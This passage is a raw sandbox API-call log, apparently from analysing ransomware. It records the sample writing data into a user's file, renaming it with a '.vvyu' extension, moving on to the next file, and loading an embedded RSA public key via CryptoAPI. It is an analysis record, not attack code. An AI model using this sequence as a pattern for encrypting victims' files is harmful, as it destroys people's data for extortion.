(HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d475f0 | out: hHeap=0x6a0000) returned 1 [0183.082] GetCurrentThreadId () returned 0x264 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cdd50 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.082] GetCurrentThreadId () returned 0x264 [0183.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e618 [0183.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e660 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e600 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e678 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e5d0 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e618 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d475f0 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d47800 [0183.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d47a18 [0183.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47800 | out: hHeap=0x6a0000) returned 1 [0183.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a18 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e600 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e630 | out: hHeap=0x6a0000) returned 1 [0183.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309e8 | out: hHeap=0x6a0000) returned 1 [0183.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d475f0 | out: hHeap=0x6a0000) returned 1 [0183.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.093] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x3e67, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x3e67, lpOverlapped=0x0) returned 1 [0183.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.094] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3e6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.094] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d43778 [0183.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d43778, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d43ba8 [0183.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.095] WriteFile (in: hFile=0x584, lpBuffer=0x2d43ba8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d43ba8*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43ba8 | out: hHeap=0x6a0000) returned 1 [0183.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.096] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.096] CloseHandle (hObject=0x584) returned 1 [0183.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d43778 [0183.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.098] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\0auOdApiPMQwtk.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\0auodapipmqwtk.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\0auOdApiPMQwtk.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\0auodapipmqwtk.mp3.vvyu")) returned 1 [0183.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.101] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.104] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7784b980, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0x781d5000, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x40ec7600, ftLastWriteTime.dwHighDateTime=0x1d8a89d, nFileSizeHigh=0x0, nFileSizeLow=0xb6800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", cAlternateFileName="12471D~1.EXE")) returned 1 [0183.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309e8 [0183.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0183.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309e8 | out: hHeap=0x6a0000) returned 1 [0183.104] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned=".exe" [0183.105] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.105] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=747520) returned 1 [0183.105] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.108] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb67da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.108] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.109] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.109] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x25805, lpOverlapped=0x0) returned 1 [0183.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2c4afd0 [0183.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.112] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.113] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.113] CryptHashData (hHash=0x2cbfa50, pbData=0x2c4afd0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.113] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.113] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.113] GetLastError () returned 0x0 [0183.113] SetLastError (dwErrCode=0x0) [0183.113] GetLastError () returned 0x0 [0183.113] SetLastError (dwErrCode=0x0) [0183.113] GetLastError () returned 0x0 [0183.113] SetLastError (dwErrCode=0x0) [0183.113] GetLastError () returned 0x0 [0183.113] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.114] SetLastError (dwErrCode=0x0) [0183.114] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 0x0 [0183.115] SetLastError (dwErrCode=0x0) [0183.115] GetLastError () returned 